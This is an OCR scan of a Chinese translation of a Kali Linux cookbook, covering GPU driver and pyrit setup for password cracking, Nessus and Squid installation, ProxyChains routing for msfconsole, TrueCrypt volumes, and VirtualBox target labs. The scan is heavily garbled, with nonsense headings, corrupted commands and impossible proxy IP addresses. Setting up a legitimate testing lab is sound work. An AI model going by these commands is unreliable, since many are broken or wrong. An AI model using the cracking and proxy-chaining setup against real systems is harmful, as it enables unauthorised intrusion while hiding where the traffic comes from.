Parallel Processing (APP) SDK、OepnCL 和 CAL++。 我 们 可 以 利用 ATI Stream 技 术 的 优势 来 
运行 计算 密集 型 任务 -- 它们 通 第 运行 在 CPU 上 -- 使 它们 更 快 更 高 效 地 执行 。 更 多 ATI Stream 
技术 相关 的 详细 信息 ， 请 访问 www.amd.com/stream -° 


准备 


需要 网 络 连 接 来 完成 这 个 秘籍 。 同 时 在 开始 这 个 秘籍 之 前 需要 准备 内 核 头 文件 ， 它 在 第 
有 了 所 涉及 。 


RAE JE 
TERMI 6 Fe Bo A ATIS) : 


1. FTR RAAP HMA RIM : 


cd /tmp/ 
wget http://www2.ati.com/drivers/linux/amd-driver-installer-121-x86.x86 64.run 


我 们 也 可 以 从 下 面 的 网 址 下 载 显 示 驱 动 : http://support. 
amd.com/us/gpudownload/Pages/index.aspx ° 


:-/tmp# cd /tmp 
:/tmp£ wget http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86 64.run 


--2013-06-05 22:47:08-- http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86 64.run 
Resolving www2.ati.com (www2.ati.com)... 12.120.106.146 

Connecting to www2.ati.com (www2.ati.com) |12.120.106.146|:80... connected. 

HTTP request sent, awaiting response... 200 OK 

Length: 106085279 (101M) [application/octet-stream] 

Saving to: 'amd-driver-installer-12-1-x86.x86 64. run' 


106,085,279 1.65M/s in 59s 


2013-06-05 22:48:07 (1.73 MB/s) - 'amd-driver-installer-12-1-x86.x86 64.run' saved [106085279/106085279] 


: /tmp# fi 





sh amd-driver-installer-12-1-x86.x86 64.run 


x AMD Catalyst(TM) Proprietary Driver 8.93 Setup 





"Options 
“Install Driver 8.93 on X. Org 6.9 or later 64-bit 
» Generate Distribution Specific Driver Package 





在 安装 完成 之 后 ， 重 启 你 的 系统 来 使 改变 生效 ， 并 且 避 免 不 稳 定 。 
s n 


apt-get install libroot-python-dev libboost-python-dev libboosti.40-all-dev cmake 


下 载 并 解压 AMD APP SDK > 4846 4% 5 CPURW : 


wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6-l1nx64.tgz 
mkdir AMD-APP-SDK-v2.6-lnx64 

tar zxvf AMD-APP-SDK-v2.6-1nx64.tgz -C /tmp/AMD-APP-SDK-v2.6-1nx64 
cd AMD-APP-SDK-v2.6-1nx64 


通过 下 列 命 令 安装 AMD APP SDK : 


sh Install-AMD-APP.sh 


在 .bashsrc 文件 中 设置 ATI Stream 的 路 径 : 


echo export ATISTREAMSDKROOT=/opt/AMDAPP/ >> ~/.bashrc 
source ~/.bashrc 


8. 下 载 并 编译 calpp 


cd /tmp/ 

svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp 
cd calpp/trunk 

cmake . 

make 

make install 


9. 下 载 并 编译 pyrit 


cd /tmp/ 

svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src 
cd pyrit_src/pyrit 

python setup.py build 

python setup.py install 


10. 构建 并 安装 OpenCL : 


cd /tmp/pyrit_src/cpyrit_opencl 
python setup.py build 
python setup.py install\ 


11. 对 cpyrit calpp 的 安装 做 一 些小 修改 : 


cd /tmp/pyrit_source/cpyrit_calpp 
vi setup.py 


VERSION = '0.4.0-dev' 


把 它 改 成 : 


VERSION = '0.4.1-dev' 


CALPP INC DIRS.append(os.path.join(CALPP INC DIR, ‘include' )) 
把 它 改 成 : 
CALPP INC DIRS.append(os.path.join(CALPP INC DIR, 'include/CAL')) 


12. 4 JVEATI GPU 模块 添加 到 pyrit : 


python setup.py build 
python setup.py install 
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pyrit benchmark 


达 显 卡 驱 动 


奖 伟 达 的 并 行 计算 架构 。 在 CUDA 工 具 包 的 安装 之 后 ， 首 先 
这 会 带 来 计算 性 能 的 戏剧 ， x E 


2.4 安装 和 配置 英 伟 


这 个 秘籍 中 ， 我 们 会 拥抱 CUDA ， 
会 安装 英 伟 达 开发 者 显示 驱动 。 通 过 使 用 GPU 的 威力 ， 
们 通常 用 于 一 些 类 似 密 码 破解 的 场合 。 


Md 


y 


请 浏览 他 们 的 官方 网 站 。 





准备 
需要 网 络 连接 来 完成 这 个 秘籍 。 
同时 需要 在 开始 之 前 准备 内 核 头 文件 ， 这 在 第 一 节 中 有 所 涉及 。 


为 了 完成 问 伟 达 驱 动 的 安装 ， 需 要 关闭 X 会 话 。 


操作 沙弥 


让 我 们 开始 安装 和 配置 英 伟 达 显 卡 驱动 : 


1. 下 载 问 伟 达 开 发 者 显示 驱动 ， 根 据 你 的 CPU 架构 : 


cd /tmp/ 
wget http://developer.download.nvidia.com/compute/cuda/4 1/rel/ drivers/NVIDIA-Lin 
UX-x86. 64-285.05.33.run 


:/tmp# cd /tmp 
:/tmp# wget http://developer.download.nvidia.com/compute/cuda/4 1/rel/drivers/NVIDIA-Linux-x86_64-285.G 


5.33.run 

- -2013-06-05 22:56:50-- 
85.05.33. run 

Resolving developer.download.nvidia.com (developer.download.nvidia.com)... 69.31.106.56, 69.31.106.51 
Connecting to developer.download.nvidia.com (developer.download.nvidia.com) |69.31.106.56|:60... 


http://developer.download.nvidia.com/compute/cuda/4 l/rel/drivers/NVIDIA-Linux-x86 64-2 


HTTP request sent, 


awaiting response... 


200 OK 


Length: 56710739 (54M) 


[application/octet -st ream] 


Saving to: 


"NVIDIA-Linux-x86 64 


-285.05 


.33.run' 


] 5,934,856 175K/s eta 4m 16s 





2， 安 装 驱 动 : 


chmod +x NVIDIA-Linux-x86 64-285.05.33.run 
./NVIDIA-Linux-x86 64-285.05.33.run -kernel-source-path='/usr/src/ linux' 


3. FA&CUDAT £6, : 


wget http://developer.download.nvidia.com/compute/cuda/4 1/rel/ toolkit/cudatoolki 
t 4.1.28 linux 64 ubuntuii1.04.run 


4， 安 装 CUDA 工 具 包 到 /opt 


chmod +x cudatoolkit 4.1.28 linux 64 ubuntu11.04.run 

./cudatoolkit 4.1.28 linux 64 ubuntui1.04.runConfigure the environment variables r 
equired for nvcc to work: 

echo PATH=$PATH:/opt/cuda/bin >> -/.bashrc 

echo LD LIBRARY PATH-$LD LIBRARY PATH:/opt/cuda/lib >> -/.bashrc 

echo export PATH >> -/.bashrc 

echo export LD LIBRARY PATH >> -/.bashrc 


5. 运行 以 下 命令 来 使 变量 生效 : 


source ~/.bashrc 
ldconfig 


6. 安装 pyrit 的 依赖 : 


apt-get install libssl-dev python-dev python-scapy 


7 下载 并 安装 GPU 增 效 工具 pyrit 


svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src 
cd pyrit_src/pyrit 

python setup.py build 

python setup.py install 


8 最后， 将 美 伟 达 GPU 模 块 添加 到 pyrit 


cd /tmp/pyrit_src/cpyrit_cuda 
python setup.py 
build python setup.py install 


为 了 验证 nece 是 否 正确 安装 ， 我 们 需要 键入 下 列 命 令 : 


pyrit benchmark 


2.5 升级 和 配置 额外 的 安全 工具 
这 个 秘籍 中 ， 我 们 会 涉及 到 升级 Kali， 以 及 配置 一 些 额 外 的 工具 ， 它 们 对 于 之 后 的 章节 和 秘籍 
十 分 实用 。 由 于 Kali 的 包 在 发 布 之 间 会 不 断 升 级 ， 你 很 快 就 会 发 现 比 起 之 前 在 你 的 DVD 中 下 载 


好 的 工具 ， 又 提供 了 一 系列 新 的 工具 。 我 们 会 以 升级 来 开始 ， 之 后 获得 Nessus 的 激活 码 ， 并 
以 安装 Squid 来 结束 。 


操作 步骤 
让 我 们 开始 进行 升级 ， 以 及 配置 额外 的 安全 工具 。 


1. 使 用 仓库 中 最 新 的 修改 来 更 新 本 地 的 包 索 引 : 


apt-get update 


2， 升 级 现 有 的 包 


apt-get upgrade 


3. 升级 到 最 新 版 本 (如 果 可 用 的 话 ) 


apt-get dist-upgrade 


4. 获得 Nessus 的 激活 码 ， 通 过 在 这 里 注册 。 
5， 通 过 执行 下 列 命 令 来 激活 Nessus : 
/opt/nessus/bin/nessus-fetch --register A60F-XXXX-XXXX-XXXX-0006 


其 中 A6QFE-XXXX-XXXX-XXXx-0006 应 为 你 的 激活 码 。 


6. ANessus Web & &| x TK P : 


/opt/nessus/sbin/nessus-adduser 


7. 为 了 局 动 Nessus 服 务 器 ， 我 们 只 需要 执行 下 列 命令 : 


/etc/init.d/nessusd start 


8. 女装 Squid : 


apt-get install squid3 


9. 阻止 Squid 在 司 动 时 目 动 运行 : 


update-rc.d -f squid3 remove 


为 了 在 仓库 中 找到 特定 的 包 ， 我 们 可 以 在 apt-get update 之 后 使 用 下 列 命令 


apt-cache search <keyword> 


其 中 <keyword> 是 包 名 称 或 者 正则 表达 式 。 


2.6 配置 ProxyChains 


这 个 章节 中 ， 我 们 会 强制 指定 应 用 的 网 络 连接 使 用 用 户 定 义 的 代理 列表 ， 来 打破 接受 者 和 发 


送 者 之 间 的 直接 连接 。 


， 打 开 ProxyChains 的 配置 文件 : 


vim /etc/proxychains.conf 


2， 解 除 我 们 打算 使 用 的 链接 类 型 的 注释 ， 这 里 是 dynamic chain 


proxychains.conf VER 3.1 
HTTP, SOCKS4, SOCKSB tunneling proxifier with DNS. 
The option below identifies how the ProxyList is treated. 


only one option should be uncommented at time, 
otherwise the Last appearing option will be accepted 


ynamic chain 


Dynamic - Each connection will be done via chained proxies 
all proxies chained in the order as they appear in the List 
at Least one proxy must be online to play in chain 

# (dead proxies are skipped) 

# otherwise EINTR is returned to the app 

strict chain 

# Strict - Each connection will be done via chained proxies 

# all proxies chained in the order as they appear in the List 

fF all proxies must be online to play in chain 
otherwise EINTR is returned to the app 


random chain 
Random - Each connection will be done via random — 
(or proxy chain, see chain len) from the list. 
this option is good to test your IDS :) 


# Make sense only if random chain 
7) 


&£chain Len = 2 





3， 向 列表 中 添加 一 些 代 理 服务 器 : 


ProxyList format 
type host port [user pass] 
(values separated by 'tab' or 'blank') 


Examples: 


# 

# 

# 

= 

# 

# 

# 

# socks5 192.168.67.78 1080 
# http 192.168.89.3 8080 
# 

# 

# 

# 

# 

# 

# 


socks4 1892.168.1.48 18080 
http 192.168.39.93 8080 


proxy types: http, socks4, soc«sb 
( auth types supported: ‘basic -http 


[ProxyList] 

# add proxy here 

# meanwile 

# defaults set to ‘tor 

socks4 127.0.0.1 9050 

socksS 398.206.2.3 1893 
/5B.22.85.1/0 1658 





4. 使 用 我 们 的 链 式 代理 来 解析 目标 主机 : 


proxyresolv www.targethost.com 


5. 现在 可 以 在 我 们 打算 使 用 的 应 用 上 运行 ProxyChains， 例 如 msfconsole 


proxychains msfconsole 


.7 OE 3 n 


NO 


这 一 章 的 最 后 一 个 秘籍 关于 信息 隐私 。 我 们 会 使 用 TrueCrypt 通 过 密 钥 来 隐藏 重要 和 私密 的 数 
字 人 信息， 远见 公众 的 眼睛 。 


1， 通 过 访 
= Applications Menu | Kali | Forensics | Digital Anti Forensics | install truecrypt 


来 安装 TrueCrypt。 


| TrueCrypt 7.1a Setup 


TrueCrypt is a softuare systen for establishing and maintaining an 
on-the-flu-encrupted volune (data storage device}, On-the-fly encryption 
Heans that data are autonaticallu encrypted or decrypted right before they 
are loaded or saved, without any user intervention, Ho data stored on an 
encrypted volune can be read (decrypted?) uithout using the correct 
passuord/keufiletís? or correct encryption keys, Entire file systen is 
encrypted te.,g,, file nanes, folder names, contents of every file, 

free space, neta data, etc?, 


Please select one of the belou options: 





Extract „tar Package File || Install TrueCrypt 
点 击 Install TrueCrypt ( 4% TrueCrypt) 并 且 遵 循 屏 幕 上 的 指导 i 


2. 从 Applications Menu | Kali Linux | Forensics | Digital Anti Forensics | truecrypt 运 


行 TrueCrypt， 你 会 看 到 下 面 的 究 口 : 


Volumes Favontes Tools 




















| Slot Volume Size Mount Directory Type 


eae l al 
lp 2 | 
[a 3 J 


(a d 











| a 5 

lx 6 

Sao] 

pem 

<a 9 

(a 10 

sae 11 

| 12 Y | 























| Create Volume | [vi ime Properties... | | wipecache | 


ee S 7 79 


Never save history | Volume Tools... | | Select Device... 


Mount Auto-Mount Devices | | Dismount All | | Exit | 


3. at Create Volume (新 建 卷 ) 来 启动 TrueCrypt Volume Creation Wizard (TrueCrypt# 
创建 向 导 ) 。 


Volume 








4. 保留 默认 选项 并 点 击 Next o 


5. 


6. 


16. 


选择 standard Truecrypt (标准 TrueCrypt) 模式 并 点 击 Next ° 


点 击 Select File. (ALH) 按钮 并 为 新 的 TrueCrypt 卷 指定 名 称 和 路 径 。 完 成 后 点 
击 Save (保存 ) 









Volume Location 


Never save history 


| x Specify a New TrueCrypt Volume 


+| Browse for other folders 


-— to create now. 


| Cancel | Save | 


| | | | | Select File... | 


上 pt container), 


etc. A 


Name: CryptVolume | be, for 


"Select File" 


Save in folder: girot | he location 


| NOT encrypt 


created 


ng files (later 


Fou are about 


| Help | | « Prev | Next > | | Cancel | 


Ad: Next 按钮 并 选择 打算 使 用 的 加 密 和 哈 希 算法 。 


a 


在 下 个 屏幕 中 ， 我 们 会 为 容器 指定 空间 总 量 。 


现在 我 们 需要 为 我 们 的 卷 键入 密码 。 点 击 Next ° 


ARLA? 


在 下 个 屏幕 中 ， 向 导 会 让 我 们 在 视 口内 移动 鼠标 ， 来 增加 加 均 冤 钥 的 均码 强度 。 完 成 


点 击 Format 


. 按 需 选择 Cross-Platform Support (353-6 X44 ) a 


(格式 化 ) 按钮 。 


格式 化 会 开始 ， 完 成 时 TrueCrypt 的 卷 就 创建 好 了 。 按 下 ok 或 Exit 


我 们 现在 回 到 TrupCrypt 窗 口 。 


从 列表 中 选择 一 个 Slot (4$) 来 解密 我 们 的 卷 ， 点 击 select File. 
打开 我 们 创建 的 卷 。 


点 击 Mount 


ER) 并 键入 我 们 的 均码 ， 完 成 后 点 击 OK ° 


(退出 ) 。 


(选择 文件 ) 


ES 


大 大 


第 二 章 定制 Kali Linux 


Volume Size Mount Directory 


| | EEG EN NI 


Enter password for "/root/CryptVolume" 


Password: [TTT | 


[] Cache passwords and keyfiles in memory | Cancel | 
O Display password 


O Use keyfiles eytiles... | Options > | 
| Create Volume | Valume Properties 


Volume 


eg Volume Tools... Select Device... 
Mount Auto-Mount Devices | | Dismount All | Exit | 


17. RAHAT A38 3d 46 38 Eoot ds 338 3d dE XB RADNE” UREZORG LHe BRN 
完成 之 后 ， 只 需要 点 击 dismount All (BRIAR) © 








Select File... 


| /root/CryptVolume 





Never save history 














工作 原理 


这 个 秘籍 中 ， 我 们 配置 了 Truecrypt， 创 建 了 保护 卷 ， 之 后 挂 载 了 它 。 这 是 个 用 于 保护 数据 安 
全 性 的 实用 工具 。 
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AK 
fal 4 
既然 我 们 已 经 了 解 了 Kali Linux 所 和 包含 的 工具 ， 现 在 我 们 要 调查 一 些 真 实 世界 的 场景 。 我 们 进 


行 的 许多 攻击 都 有 意 在 有 漏洞 的 软件 和 系统 上 执行 。 但 是 ， 当 你 使 用 K eatin 
它 不 可 能 像 我 们 当前 的 测试 平台 那样 没有 防护 。 


这 一 草 中 ， 我 们 会 探索 一 些 技巧 ， 来 建立 起 一 些 趴 实 的 测试 环境 。 在 当前 的 信 — 
中 ， 多 数 公司 都 使 用 平台 即 服务 (PAAS) 解决 方案 ， 云 服务 器 主机 ， 或 者 使 用 小 型 网 络 ， 
们 由 有 呆 面 、 服 务 器 和 防火 墙 (单独 ) 或 防火 墙 和 路 由 的 组 合 组 成 。 我 们 会 建立 这 些 环境 ， " 
后 对 它们 发 起 攻击 。 


我 们 所 有 攻击 的 目的 都 是 获取 root 级 别 的 访问 。 


3.1 #A VirtualBox 


在 第 一 章 (安装 和 启动 Kali) 中 ， 我 们 简要 谈 多 了 VirtualBox 的 用 法 ， 便 于 在 虚拟 环境 中 安装 
Kali Linux ° VirtualBox Æ Oracle 的 现 有 产品 ， 并 且 作 为 应 用 运行 在 宿主 操作 系统 上 。 它 通过 
创建 虚拟 环境 允许 操作 系统 安装 并 运行 。 这 个 工具 极其 重要 ， 可 以 提供 靶 机 来 测试 你 的 Kali 
Linux 技巧 。 


这 一 章 中 ， 我 们 会 极 大 依赖 VirtualBox， 并 且 会 修改 它 的 配置 来 得 到 我 们 希望 的 网 络 配 置 类 
型 。 我 们 将 这 一 节 作 为 每 个 场景 单元 的 起 点 ， 所 以 关键 要 熟悉 这 些 步 又。 


准备 
需要 因特网 或 内 部 网 络 的 链接 来 完成 这 个 模块 。 
ER VE 7 HR 


让 我 们 通过 打开 VirtualBox 来 开始 : 


1. È VirtualBox ， 并 点 击 New 来 开启 虚拟 机 向 导 : 
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Dets E Snapshots 


The left part of this window iz a list of all virtual machines on your computer. The lst is empty now "e. 
created any virtual machines yet. 


In order to create a new virtual machine, press the New button in the main tool bar located 
at the tap of the window, 


in 


You can press the Fil key to get instant help, or visit www. virtualox.org for the latest e 





2. ik Next 按钮 ， 输 入 虚拟 机 的 名 称 ， 并 选择 OS 类 型 和 版 本 : 这 一 章 中 我 们 会 使 用 
Linux ` Solaris 或 Windows 操作 系统 。 选 择 合适 的 操作 系统 并 点 击 Next 按钮 来 继续 : 


Name and operating system 


Please choose a descriptive name for the new virtual machine 
and select the type of operating system you intend to install 
on it. The name you choose will be used throughout VirtualBox 











3， 选 择 基 本 内 存 (RAM) 的 总 量 ， 它 们 会 分 配给 虚拟 机 。 我 们 使 用 默认 值 。 点 击 next 。 
4. 为 新 的 虚拟 机 创建 新 的 虚拟 硬盘 ， 点 击 Next 按钮 。 
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Create Virtual Machine > x 





















































If you wish you can add a virtual hard drive to the new 
machine. You can either create a new hard drive file or select 
one from the list or from another location using the folder 
icor l. 


If you need a more complex storage set-up you can skip this 
step and make the changes to the machine settings once the 
machine i5 created. 

The recommended size of the hard drive is 8.00 GB. 

C Donotadd a virtual hard drive 

(* Create a virtual hard drive now 

C Use an existing virtual hard drive file 












































— a 
eme. | E 
| 


5. 新 的 向 导 窗 口 会 打开 。 保 留 默认 的 VDI 文件 类 型 ， 因 为 我 们 不 打算 使 用 其 它 可 视 化 软 
ft o 
6. 我 们 会 在 虚拟 磁盘 储存 上 保留 默认 选项 。 点 击 Next 来 继续 。 


T. 设置 虚拟 磁盘 文件 位 置 和 大 小 : 





Create Virtual Hard Drive 


File location and size 


drive. 


2,00 TB 


Please type the name of the new virtual hard drive file into the box below or 
dick on the folder icon to select a different folder to create the file in. 


lanx “网 


Select the size of the virtual hard drive in megabytes. This size is the limit on 
the amount of file data that a virtual machine wall be able to store on the hard 


7a | 16,00 GB 
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8， 检 查 设 置 是 否 正 确 ， 并且 点 击 create 按钮 来 开始 创建 虚拟 磁盘 文件 。 


9. 我 们 现在 回 到 前 一 个 向 导 ， 展 示 了 虚拟 机 参数 的 汇总 。 点 击 create RAR: 


File Machine Help 


"ER 


Mew  Setüngs Start Discard 


dra (^ Powered OR Genera 


Name: Kali Linux 
Operating System: Ubuntu (64 bit) 


[a] System 
Base Memory: 512 MB 


Boot Order: Floppy, CD/DVD-ROM, Hard Disk | Kali Linux 
Acceleration: — VT-x/AMO-v, Nested Paging 











ijj Display 
Video Memory: 
Remote Desktop Server: 
Controler: IDE 
IDE Secondary Master: [CD/DVD] Empty 


Controller: SATA 
SATA Port 0: Kali Linux. vai (Normal, 15.00 GB) 


o» Audi 
Host Driver: Windows DirectSound 
Controler; ICH ACST 





10. 创建 新 的 虚拟 机 之 后 ， 我 们 准备 好 了 安装 操作 系统 ， 它 刚刚 在 VirtualBox 中 配置 好 。 


11. 在 VirtualBox 的 主 窗 口中 ， 选 中 我 们 刚刚 创建 的 操作 系统 名 称 ， 之 后 点 击 Settings 按 
4A: 





File Machine Help 






Discerd 


Name; 
Oper atim 


gi Sy: 
Base Mer 
Boot Ord 
Accelerat 


12. 既然 基本 的 安装 步骤 已 经 完成 了 ， 我 们 现在 使 用 下 载 的 ISO 文件 作为 虚拟 光一 。 
省 你 烧 录 物理 DVD ew 的 时 间 。 在 settings AM > AÈ storage inii 
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General 


| Storage 


Storage Tree 一 一 | Attribu 






Al 


Fr : E Controller: IDE cD) 
xd dB Controller: SATA Inform; 
: = T A. Kali Linux. vdi 
(9 USB 


Shared Folders 


a qo 





13. 之 后 ， 在 storage Tree 下 面 ， 选 中 controller: IDE 下 面 的 Empty 光盘 图 标 。 这 会 选择 
我 们 的 “虚拟 ”CD/DVD ROM ee 。 在 屏幕 的 右边 ， attribute 下 面 ， 点 击 光盘 图 标 。 在 
弹出 的 菜单 中 ， 从 列表 中 选 如 果 ISO 文件 没有 出 现 ， 选 
择 Choose a virtual CD/DVD disc file... 选项 并 找到 你 的 ISO 。 一 旦 你 元 成 了 这 


Heo Aah ook 按钮 。 





@ Controller: SATA information Host Drive E 
= Kal Linu. vd ha á (gg Remove disk from virtual drive 
Location: = 
Attached Ta: -- 
20d] 20 | 
Select a setings category Fom the let on the left-hand side and move the mouse over s settings | 
ten Je get more nformabion. 





~ 


14， 点 击 start 按钮 ， 之 后 点 击 内 部 的 新 窗口 ， 并 执行 安装 。 安 装 步 又 在 这 一 章 的 “安装 到 硬 
AL”? APT RX 


IAS 
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这 一 草 以 创建 新 的 VirtualBox 虚 拟 实例 来 开始 ， 之 后 我 们 选择 了 我 们 的 操作 系统 ， 并 设置 内 存 
和 硬盘 大 小 。 之 后 ， 我 们 选择 了 ISO 文件 ， 之 后 将 ISO 插入 我 们 的 虚拟 CD/DVD 驱动 器 
中 。 最 后 ， 我 们 启动 了 虚拟 环境 ， 便 于 安装 操作 系统 。 


在 这 一 章 的 剩余 部 分 中 ， 我 们 会 使 用 VirtualBox 作 为 所 选 工具 来 建立 不 同 的 环境 。 


P 


我 们 所 执行 的 操作 可 能 会 让 主机 不 稳定 甚至 谣 溃 。VirtualBox 提 供 了 杰出 的 工具 来 备份 虚拟 环 


境 : 
1. 在 主 窗口 中 ， 点 击 你 打算 备份 的 庶 拟 服务 器 : 


2. GHEMARSA > SH Clone 菜单 项 : 





| $3 Settings... Ctrl 5 
i mal 

ig Remove.. Ctri+R 

: [Group Ctri+U 

Gp Start 

Lr iTi «p 

| T 

Bj] Show Log... Ctrl+L 


PETES M 


=:| Show in Explorer 
(jd Create Shortcut on Desktop 


Sort 


9. 在 克隆 窗口 中 ， 为 你 的 新 虚拟 服务 器 输入 名 称 。 


一 一 
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Clone Virtual Machine ? 
New machine name 


Please choose a name for the new virtual machine. The new 
machine wil be a done of the machine Metasploitable2. 


[Metssploitablez Clonel 


[ Reinitialize the MAC address of all network cards 





Hide Descripbon ‘Bam | Next > Cancel 





4. Aid: Next ? 在 随后 的 界面 中 d 选择 Linked clone 或 Full clone ° 它们 在 下 面 展示 。 


© Full clone :在 完整 元 隆 的 模式 中 ， 会 创建 完全 独立 的 虚拟 机 备份 。 


O Linked clone : 在 链接 克隆 的 模式 中 会 截取 快照 来 创建 备份 但 是 4 链接 克隆 依 


赖 于 原始 文件 的 功能 。 这 会 降低 链接 克隆 的 性 能 。 
Clone Virtual Machine ? ET 


Clone type 


Please choose the type of done you wish to create. 


If you choose Full clone, an exact copy (induding all virtual 
hard drive files) of the onginal virtual machine wil be created. 
[f you choose Linked clone, a new machine will be created, 
but the virtual hard drive files wil be ted to the virtual hard 
drive files of original machine and you wil not be able to move 


the new virtual machine to à different computer without 
moving the original as well. 


if you create a Linked clone then a mew snapshot wil be 
created in the original virtual machine as part of the cloning 
pices. 
f Ful done 
C Linked done 


«Bak || Clone | Cancel | 





5. Wit clone 并 等 待 虚 拟 机 克隆 完成 。 
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PES 2 E Tr Ee 


8$ Clone Virtual Machine: Cloning Machine Kd | 


Cloning Disk 'Metasploitable.vmdk ... ... (2/3) 


5 X 


5 minutes remaining 





3.2 TA Windows 2271 


到 目前 为 止 ， 以 及 可 见 的 未 来 中 ， 微 软 的 Windows 系统 都 是 许多 个 人 和 企业 所 选 的 操作 系 


oe o 

年 运 的 是 ， 微 软 提 供 了 一 种 方法 来 获取 测试 操作 系统 。 
准备 

需要 互联 网 或 内 部 网 络 连接 来 完成 这 个 模块 。 
HERVE 2p 9 


FR Windows 靶 机 的 步骤 如 下 所 示 : 


1. 打开 浏览 蜂 并 访问 Microsoft Technet : <http://technet. microsoft.com/en- 
us/ms3/6608> ° 


2. FRR GM) Ad: Downloads 链接 : 





Techhet Product: + IT Resources = Domwninads = Traaning = Support = 





zs Microsoft 


TechNet [^ 
| Home | sores Wik AA 3all&ry Lena AGA Ferri Hoga 


Troubleshooting 


Private Cloud Planning Guide for — 


Systems Management EE 


二 SUD TE mcos youl Gees es res 








duly 22, 20 
z : Fan Eafgr -hi m Err Gin Cinu 
Read this document from Microsoft to learn how SS ETC ER 
Private Cloud infrestructure as # Service patterns Pirate Lléud Teqhrecal Lancapt and (rar Cuntscnbe to be Techibést Flash meesirits 
affect Systems Management design, This guide 
should be used as an aid bo operstions, architects, and Prate Claud Planning Guide for Systems 
consultants who are designing processes, procedures, Nr Emer 
and best practices Tor a pmte cloud 
Syste Canker INT Sube ómwninagd Tien nad E 
ğ 


Technology News El Local Resources - US 


i Free Private Cloud Triats 
| Server & Management 一- Windows 
F "indaws AUTE | Le ng ga^) li-an mE 


[he mew Hesh Pairs come: to Windows 8.1 and e E 
Hindows Server 1017 download 


Advanced Tools and Scnpting with Powershell 21 
Winia Phione 





Get service packs 
Go to Microsoft's Download Center 


Subscriptions 


4. 在 下 一 个 界面 中 ， 你 可 以 选择 要 下 载 的 东西 ， 取 决 于 你 想 要 测试 的 产品 。 推 郑 你 选择 
Windows Server 2012 ， Windows 8 和 Windows 7 ° 














iari Home + Terhhat Evalugl»anm Cate 


I-Teatured evaluations ; 





Need Developer Evaluations? 


ks 1 Ewa iaponm Lerig 


Featured Downloads 


Windows Server 2012 














tals 
k dr a 
xls 
Mir ils t 
ncl FWinSere 2012 82 andasngCir 2017 RZ. For release 
Wee Protessional 2113 pnr hit VgE 


5. —8S4FrAjISO:» 7 3 6ix—3x" 3x K VirtualBox $538 "P 8548 Ho 


3.3 TA Linux 转机 


对 于 多 数 的 面向 Web 的 服务 器 的 部 署 ，Linux 是 一 种 备 选 的 操作 系统 。 与 Windows 先 比 ， 它 
的 开销 相对 较 低 (主流 发 行 版 免费 ) ， 这 使 它 成 为 多 数 云 主机 、PAAS 和 服务 器 环境 的 理想 操 
作 系 统 。 


这 个 秘籍 中 ， 我 们 会 示例 如 何 下 载 多 种 Linux 发 行 版 。 
准备 

需要 互联 网 或 内 部 网 络 连 接 来 完成 这 个 模块 。 
TRE Sy HR 

FA Linux 靶 机 的 步骤 如 下 所 示 : 


1 打开 浏览 器 并 访问 Distro Watch : http://www.distrowatch.com 。 


2， 你 会 看 到 超过 100 个 Linux 发 行 版 的 列表 。 推 荐 选择 一 个 最 小 的 发 行 版 ， 而 不 是 流行 的 
版 本 (CentOS ` Ubuntu ` Fedora 和 Debian) 。 这 个 页 面 像 下 面 这 样 : 


Job IT > 

] AX 十 并 T2 
RI TIL An IR 
Y” N i ZU 


















































Ig Distrowetch.com .. | EE E 





cre ade En id) "Abi Ti 
Put fun back, into compuliesg, Lise Lira, WD hs Cone * Ghar Dear Beery Face Hih sae 
+ Fup UG emen "SAL aL nadar “dat 
Gà | spiert Citrate = i SE Le "EDC CREAR RE "Eds bE 


Cimm ypu vem Liver Egg, an beroven Ulu ee hed qe rl rr oe Cr ioe 
Hr Opna 
CHE 

















Get The Boge! 





| BE Lusit Mees and Updates 


CE HF Pee 





Bare Fas ness Option 
Diria Aj = Melee) ii = Hen: ij w (ar Ab u Fink. 
nmi 2 REN | i 
Peter Fieinticidtsen has announced the ayalabüty of the riia public beta of Seeger 7 1 





Admini aie non aes "Debian Fila" "Tres fad “ieee” [asus] bhalg belegen oi 
Deban Edu zz wrapped up xis; Dub Edu ird ncn um SR (bu Lua 
li i based on Deben provate an Qul -cf The Tex errant of a 
configured echon network Solteere updale: wwilched rari are rr profiles irm Wes Niaeaga your Aenea and Phone 
vica be Herbaondanzoer tor meteor contisuranon, a5 wicd dida work ony mone changed Buca wrt, 20. Motels Durgc i danger 
TR Ger CO pee noa mnt Eee Be BackAcwem (Do omg SEEN OUR. 
lec aly-pete Feed venons vell be replaced Ey the olfoal packages vetu ety ane rebel 
Prem Deben. Pride Tuy oif baci ia Bw ife mult desktop adden ippis lor «Pann the 


Coad foe ren cand ened 
metal jhe [rige "ue a mabit prece 
dank Sut x ranthly charred ados ane 

shaped 52 M oraruralk n Der aim 








= : derop on FOIE added ay to fme Gell isiallaton for easies dn of crash 
defsan-ex-! Vee i reo ESLG, iD Harketing Lftecttvenaas 
nat wie Bateibutonn sea perum lip 





3. 一旦 你 下 载 了 ISO， 请 遵循 这 一 章 “ 熟 悉 VirtualBox” 秘 夭 中 的 指南 。 


Bs Fe khar ee mur ll ha fed reels cud En aia a d dà om Mahia 


3.4 攻击 WordPress 和 其 它 应 用 


选择 越 来 越 多 的 公司 在 日 常 业务 中 使 用 SAAS (软件 及 服务 ) 工具 。 人 例如， 公司 普遍 使 用 
WordPress 作 为 网 站 的 内 容 管 理 系 统 ， 或 Drupal 作为 内 部 网 络 。 在 这 些 应 用 中 定位 漏洞 的 能 
力 具 有 极 大 的 价值 。 


收集 被 测试 应 用 的 一 个 很 好 的 方式 就 是 Turnkey Linux 。 这 个 秘籍 中 ， 我 们 会 下 载 流 行 的 
WordPress Turnkey Linux 发 行 版 。 


准备 
需要 互联 网 或 内 部 网 络 连 接 来 守成 这 个 模块 。 
RAE UF TK 


攻击 WordPress 应 用 的 步骤 如 下 所 示 : 


， 打开 浏览 器 并 访问 Turnkey Linux 的 主页 : «http://www. turnkeylinux.org>。 主 页 如 图 所 
ud 


第 三 草 高 级 测试 环境 


TURM KEY ¥ AFPS fF HELP F BLOG p SCREENSHOTS > TURMKEY HUB 
| # T : ]-iogin | Register esc Go 


—— 


Have you checked out the TurnKey Hub yet? Try the live demo! 


Backup & Migration Cloud Servers 
Wordpress 
| Secure and easy server backups Rapidly explore and depioy 
